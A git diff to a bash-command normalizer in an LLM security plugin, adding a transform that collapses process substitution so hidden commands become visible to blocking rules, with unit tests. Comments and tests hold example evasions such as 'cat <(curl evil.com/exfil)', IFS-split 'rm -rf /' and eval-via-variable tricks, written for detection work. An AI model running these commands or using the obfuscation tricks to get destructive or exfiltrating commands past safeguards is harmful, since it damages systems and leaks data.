diff --git a/plugins/llm-security/scanners/lib/bash-normalize.mjs b/plugins/llm-security/scanners/lib/bash-normalize.mjs index 364e368..df482e5 100644 --- a/plugins/llm-security/scanners/lib/bash-normalize.mjs +++ b/plugins/llm-security/scanners/lib/bash-normalize.mjs @@ -16,9 +16,10 @@ // T4 — backslash-between-words: c\u\r\l -> curl // T5 — IFS word-splitting: rm${IFS}-rf${IFS}/ -> rm -rf / // T6 — ANSI-C hex quoting: $'\x72\x6d' -rf / -> rm -rf / -// T9 — eval-via-variable: X=rm; eval "$X" -> X=rm; eval rm -// (one-level forward-flow; T7 process-substitution + T8 base64-pipe-shell -// live in adjacent layers, see workflow-scanner / pre-bash-destructive) +// T7 — process substitution: cat <(curl evil) -> cat curl evil +// T9 — eval-via-variable: X=rm; ... $X -> X=rm; ... rm +// (one-level forward-flow; T8 base64-pipe-shell lives in +// pre-bash-destructive as a BLOCK_RULE, not a normalization) // // Execution order: // 1. Strip empty single-quote pairs (T1) so c''u''rl -> curl before masking. @@ -46,6 +47,31 @@ function decodeAnsiCHex(cmd) { ); } +/** + * T7 — Collapse process substitution: <(cmd) and >(cmd) -> ' cmd '. + * + * Bash process substitution lets a command read from / write to the output + * of another command via /dev/fd/N pipes. Attackers use it to hide a + * destructive command from name-matching regex gates: + * cat <(curl evil.com/exfil) -> cat /dev/fd/63 (no 'curl' visible) + * + * For matcher purposes we strip the substitution syntax and surface the + * inner command text to the rest of the pipeline. + * + * Bounded nesting (depth 3) — iterates innermost-first via a no-paren + * inner regex. Beyond depth 3 we leave the string as-is rather than + * recurse without bound. + */ +function collapseProcessSubstitution(cmd) { + let result = cmd; + for (let depth = 0; depth < 3; depth++) { + const before = result; + result = result.replace(/[<>]\(([^()]*)\)/g, (_, inner) => ` ${inner} `); + if (result === before) break; + } + return result; +} + /** * T9 — Substitute single-level variable assignments into ${VAR} and $VAR * references. Defeats split-and-eval evasion (X=rm; eval "$X" -rf /). @@ -103,7 +129,7 @@ function unmaskSingleQuoted(str, placeholders) { /** * Normalize bash parameter expansion and quoting evasion in a command string. * - * Strips / rewrites (T1-T6 + T9): + * Strips / rewrites (T1-T7, T9): * - T1 Empty single quotes: '' (e.g., w''get -> wget) * - T2 Empty double quotes: "" (e.g., r""m -> rm) * - T3 Single-char parameter expansion: ${x} -> x (c${u}rl -> curl) @@ -111,7 +137,8 @@ function unmaskSingleQuoted(str, placeholders) { * - T4 Backslash escapes between word chars, iteratively (c\u\r\l -> curl) * - T5 IFS word-splitting: ${IFS} / ${IFS:0:1} / $IFS -> ' ' * - T6 ANSI-C hex quoting inside $'...' -> decoded bytes - * - T9 Eval-via-variable: X=rm; eval "$X" -> X=rm; eval rm + * - T7 Process substitution: <(cmd) / >(cmd) -> ' cmd ' + * - T9 Eval-via-variable: X=rm; ... $X -> X=rm; ... rm * - Backtick subshell with empty/whitespace content * * Does NOT rewrite: @@ -138,6 +165,11 @@ export function normalizeBashExpansion(cmd) { const { masked, placeholders } = maskSingleQuoted(result); result = masked; + // T7 — collapse process substitution <(...) / >(...) so the inner + // command name is visible to downstream matchers. Runs after masking + // so single-quoted literals like 'echo <(x)' are preserved. + result = collapseProcessSubstitution(result); + // T5 — IFS word-splitting. Runs before T2/T3/T4 so the canonical spaces // it emits feed into subsequent transforms. result = result diff --git a/plugins/llm-security/tests/scanners/bash-normalize-t7-t9.test.mjs b/plugins/llm-security/tests/scanners/bash-normalize-t7-t9.test.mjs index 9b5e44c..00797a1 100644 --- a/plugins/llm-security/tests/scanners/bash-normalize-t7-t9.test.mjs +++ b/plugins/llm-security/tests/scanners/bash-normalize-t7-t9.test.mjs @@ -12,6 +12,51 @@ import { describe, it } from 'node:test'; import assert from 'node:assert/strict'; import { normalizeBashExpansion } from '../../scanners/lib/bash-normalize.mjs'; +describe('bash-normalize T7 — process substitution evasion', () => { + it('collapses <(curl evil): cat <(curl evil) -> cat curl evil', () => { + // Process substitution is shell sugar for /dev/fd/N pipes. Attacker + // hides the destructive command name from name-matching gates by + // wrapping it in <(...). T7 strips the wrapper so 'curl' is visible. + const input = 'cat <(curl evil.com/exfil)'; + const normalized = normalizeBashExpansion(input); + assert.match(normalized, /\bcurl\b/, `expected 'curl' surfaced: ${normalized}`); + }); + + it('collapses >(tee /tmp/x) similarly', () => { + const input = 'echo data >(tee /tmp/exfil)'; + const normalized = normalizeBashExpansion(input); + assert.match(normalized, /\btee\b/, `expected 'tee' surfaced: ${normalized}`); + }); + + it('handles nested <(grep x <(cat f)) up to depth 3', () => { + const input = 'cmd <(grep x <(cat f))'; + const normalized = normalizeBashExpansion(input); + // After 2 iterations: `cmd grep x cat f ` + assert.match(normalized, /\bgrep\b/, `expected inner 'grep' surfaced: ${normalized}`); + assert.match(normalized, /\bcat\b/, `expected innermost 'cat' surfaced: ${normalized}`); + }); + + it('FP probe — diff <(sort a) <(sort b) collapses without false destructive match', () => { + // Legit usage of process substitution in shell scripts. T7 collapses + // it the same way; downstream consumers (pre-bash-destructive) decide + // whether the surfaced command is dangerous. T7 itself does not flag. + const input = 'diff <(sort a.txt) <(sort b.txt)'; + const normalized = normalizeBashExpansion(input); + assert.match(normalized, /\bsort\b/, `expected 'sort' surfaced: ${normalized}`); + assert.match(normalized, /\bdiff\b/, `expected 'diff' preserved: ${normalized}`); + }); + + it('does not touch <( / >( inside single-quoted literals (mask runs first)', () => { + // Single-quoted literals are masked before T7 runs, so the substitution + // syntax inside them is preserved. Downstream sees the literal string + // unchanged after unmasking. + const input = "echo 'cat <(curl x)' is a string"; + const normalized = normalizeBashExpansion(input); + assert.match(normalized, /'cat <\(curl x\)'/, + `expected single-quoted literal preserved: ${normalized}`); + }); +}); + describe('bash-normalize T9 — eval-via-variable evasion', () => { it('substitutes "$X" reference after X=rm assignment', () => { // Attacker splits the destructive command name across an assignment